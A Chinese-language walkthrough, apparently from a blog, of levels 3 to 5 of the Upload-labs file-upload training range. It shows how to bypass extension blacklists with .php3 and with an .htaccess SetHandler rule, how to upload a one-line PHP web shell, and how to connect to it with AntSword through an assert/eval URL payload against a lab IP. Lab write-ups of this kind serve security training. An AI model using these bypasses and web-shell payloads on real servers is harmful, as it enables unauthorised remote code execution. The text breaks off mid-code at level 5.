Upload-labs 1-20关靶场通关攻略(全网最全最完整)，2024年最新2024-2024阿里巴巴网络安全面试真题解析

试一下我们的结果是否可行，很明显，我们上传成功，

执行一下我们的一句话（同第一关）

ok，下一关

3、Pass-03（黑名单验证，特殊后缀）

直接上床我们的php文件，看一下会提示什么？

不允许上传.asp,.aspx,.php,.jsp后缀文件！

很明显这块大概率过滤的是我们的后缀，我很查看下源码，可以看到要是这几个后缀匹配到就不执行上传

那么我们要进行绕过，并且要让服务器能解析我们上传的文件，

在apache中的配置文件中，我们可以看到他会将 .php  .php3  .phtml 这几个后缀当做php文件进行解析

那么我们上传.php3文件，刚过可以绕过黑名单，并且文件可以被解析

只说不做是徒劳，我们试验一下

上传成功，并且可以进行解析

ok，继续下一关

4、Pass-04（.htaccess解析绕过）

啥也不说，继续试一下php文件上传

不让我们上传，要是猜的他的黑名单的话，会格外的费劲

直接上源码

if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传!';

可以看到，这关的黑名单过滤的是相当的多，基本将我们的后缀都过滤掉了

这时候该怎么进行绕过呢

这时候补充一个知识点：

.htaccess文件解析漏洞

.htaccess参数

常见配法有以下几种：

AddHandler php5-script .jpg

AddType application/x-httpd-php .jpg

Sethandler application/x-httpd-php

**Sethandler**将该目录及子目录的所有文件均映射为php文件类型。
Addhandler 使用 php5-script 处理器来解析所匹配到的文件。
AddType 将特定扩展名文件映射为php文件类型。

简单来说就是，可以将我们所的文件都解析成php或者是特定的文件解析为php

实践

那么我们创建一个.htaccess文件写上内容进行上传

Sethandler application/x-httpd-php

这是将本目录及所有子目录的所有文件都解析为php文件

很明显直接上传成功，那么我们再将我们的一句话木马上传，当然在这我们将文件后缀改为jpg格式，反正我们上传后的文件都会被解析为php，而且jpg也不会被过滤掉

上传后直接进行访问，看我们的一句话能否配解析

ok，完美

在这块我们试一下使用蚁剑进行连接，毕竟我们的后门已经上传成功，连接服务器的最后一步肯定是必须的

因为我们写的一句话木马是双get传参，但是蚁剑默认post传参，密码是post参数，

那我们可不可以将第二个参数直接传成post呢，试一下，但很可惜我们的没有连接上

按道理来说应该是可以的，为什么不行呢？

其实是因为蚁剑在连接时，他会查询我们服务器的信息，那么这些代码就要有个执行函数才能执行，那么我们就要在post前加上eval()函数，以让我们的代码能够以命令执行

http://172.16.30.134/upload/web.jpg?0=assert&1=eval($_POST['long'])

5、Pass-05（大小写绕过）

啥也不说，直接上传php文件，看提示

显示我们的文件类型不允许

这关肯定没这么简单，因为前面的第二关就是改了文件类型

我们直接查看源码，看看怎么个事

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".